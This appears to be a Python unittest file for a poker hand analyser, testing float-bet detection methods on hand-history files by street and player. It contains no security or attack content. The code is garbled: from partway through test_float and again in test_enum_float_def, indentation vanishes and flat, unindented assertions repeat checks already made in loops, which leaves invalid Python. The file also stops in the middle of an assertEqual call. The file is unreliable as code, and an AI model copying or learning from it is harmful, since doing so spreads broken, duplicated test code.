            ('in2gr3r__F__XBFC__T__XX__R__XBRC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', True), ('river', 'zw', False)]),
            ('in2gr3r__F__XBFC__T__XX__R__BF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', True), ('river', 'zw', False)]),
            ('in2gr3r__F__XBFC__T__XX__R__XBF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', True), ('river', 'zw', False)]),
            ('in2gr3r__F__XBCF__T__XX__R__XBF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', True),
              ('river', 'zw', False), ('river', 'kr', False)]),
            ('in2gr3r__F__XBCF__T__XX__R__XBRC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', True),
              ('river', 'zw', False), ('river', 'kr', False)]),
            ('in2gr3r__F__XBCF__T__XX__R__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', True),
              ('river', 'zw', False), ('river', 'kr', False)]),
            ('in2gr2r__F__XBC__T__XX__R__XBC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', True), ('river', 'zw', False)]),
            ('in2gr2r__F__XBC__T__XX__R__BRC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', True), ('river', 'zw', False)]),
            ('in2gr2r__F__XBC__T__XBC__R__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', False), ('river', 'zw', False)]),
        ]
        for file, checks in cases:
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for strt, plr, expected in checks:
                tmp = Float(hand, strt, plr)
                self.assertEqual(expected, tmp.float_opp(),
                                 msg=file + ' ' + strt + ' ' + plr)
    def test_float(self):
        # folder with the test hands and their expected answers
        folder = f + '/testy/rece/'
        # Expected float() result for each (street, player) probe, per file.
        cases = [
            ('in0gr2r__F__BC__T__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in0gr2r__F__BC__T__XBC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in1gr2r__F__BC__T__XBC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', True)]),
            ('in1gr2r__F__BC__T__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in1gr2r__F__BC__T__BRC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in1gr2r__F__BC__T__BF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in1gr3r__F__BCC__T__XXX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False), ('turn', 'kr', False)]),
            ('in1gr3r__F__BCC__T__XXBFC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False), ('turn', 'kr', False)]),
            ('in1gr3r__F__BCF__T__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in1gr3r__F__BCF__T__XBC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', True)]),
            ('in2gr3r__F__BCF__T__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in2gr3r__F__BCF__T__XBRF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in2gr3r__F__XBCC__T__XXX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False), ('turn', 'kr', False)]),
            ('in2gr3r__F__XBCF__T__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', False)]),
            ('in2gr3r__F__XBCF__T__XBF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', True)]),
            ('in2gr3r__F__XBCF__T__XBRC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', True)]),
            ('in2gr3r__F__XBFC__T__XX__R__BRF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', True), ('river', 'zw', False)]),
            ('in2gr3r__F__XBFC__T__XX__R__XBRC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', False), ('river', 'zw', False)]),
            ('in2gr3r__F__XBFC__T__XX__R__BF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', True), ('river', 'zw', False)]),
            ('in2gr3r__F__XBFC__T__XX__R__XBF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', False), ('river', 'zw', False)]),
            ('in2gr3r__F__XBCF__T__XX__R__XBF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', False),
              ('river', 'zw', False), ('river', 'kr', False)]),
        ]
        for file, checks in cases:
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for strt, plr, expected in checks:
                tmp = Float(hand, strt, plr)
                self.assertEqual(expected, tmp.float(),
                                 msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
    def test_float_def_opp(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        file = 'in0gr2r__F__BC__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in0gr2r__F__BC__T__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr, expected in (
                ('flop', 'sf', False), ('flop', 'zw', False),
                ('turn', 'sf', True), ('turn', 'zw', False)):
            tmp = Float(hand, strt, plr)
            self.assertEqual(expected, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__BRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__BF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCC__T__XXX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf'), ('turn', 'zw'), ('turn', 'kr')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCC__T__XXBFC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf'), ('turn', 'zw'), ('turn', 'kr')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCF__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCF__T__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr, expected in (
                ('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
                ('turn', 'sf', True), ('turn', 'zw', False)):
            tmp = Float(hand, strt, plr)
            self.assertEqual(expected, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__BCF__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__BCF__T__XBRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCC__T__XXX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf'), ('turn', 'zw'), ('turn', 'kr')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'zw'), ('turn', 'kr')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XBF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr, expected in (
                ('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
                ('turn', 'zw', True), ('turn', 'kr', False)):
            tmp = Float(hand, strt, plr)
            self.assertEqual(expected, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XBRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr, expected in (
                ('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
                ('turn', 'zw', True), ('turn', 'kr', False)):
            tmp = Float(hand, strt, plr)
            self.assertEqual(expected, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr, expected in (
                ('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
                ('turn', 'sf', False), ('turn', 'zw', False),
                ('river', 'sf', False), ('river', 'zw', True)):
            tmp = Float(hand, strt, plr)
            self.assertEqual(expected, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf'), ('turn', 'zw'),
                          ('river', 'sf'), ('river', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr, expected in (
                ('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
                ('turn', 'sf', False), ('turn', 'zw', False),
                ('river', 'sf', False), ('river', 'zw', True)):
            tmp = Float(hand, strt, plr)
            self.assertEqual(expected, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf'), ('turn', 'zw'),
                          ('river', 'sf'), ('river', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'zw'), ('turn', 'kr'),
                          ('river', 'zw'), ('river', 'kr')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'zw'), ('turn', 'kr'),
                          ('river', 'zw'), ('river', 'kr')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'zw'), ('turn', 'kr'),
                          ('river', 'zw'), ('river', 'kr')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('turn', 'sf'),
                          ('turn', 'zw'), ('river', 'sf'), ('river', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr, expected in (
                ('flop', 'sf', False), ('flop', 'zw', False),
                ('turn', 'sf', False), ('turn', 'zw', False),
                ('river', 'sf', False), ('river', 'zw', True)):
            tmp = Float(hand, strt, plr)
            self.assertEqual(expected, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('turn', 'sf'),
                          ('turn', 'zw'), ('river', 'sf'), ('river', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(False, tmp.float_def_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
    def test_enum_float_def(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        file = 'in0gr2r__F__BC__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(None, tmp.enum_float_def(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in0gr2r__F__BC__T__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(None, tmp.enum_float_def(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr, expected in (
                ('flop', 'sf', None), ('flop', 'zw', None),
                ('turn', 'sf', 'call'), ('turn', 'zw', None)):
            tmp = Float(hand, strt, plr)
            self.assertEqual(expected, tmp.enum_float_def(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(None, tmp.enum_float_def(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__BRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(None, tmp.enum_float_def(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr2r__F__BC__T__BF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'),
                          ('turn', 'sf'), ('turn', 'zw')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(None, tmp.enum_float_def(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCC__T__XXX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf'), ('turn', 'zw'), ('turn', 'kr')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(None, tmp.enum_float_def(),
                             msg=file + ' ' + strt + ' ' + plr)
        file = 'in1gr3r__F__BCC__T__XXBFC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr in (('flop', 'sf'), ('flop', 'zw'), ('flop', 'kr'),
                          ('turn', 'sf')):
            tmp = Float(hand, strt, plr)
            self.assertEqual(None, tmp.enum_float_def(),
                             msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual('call', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
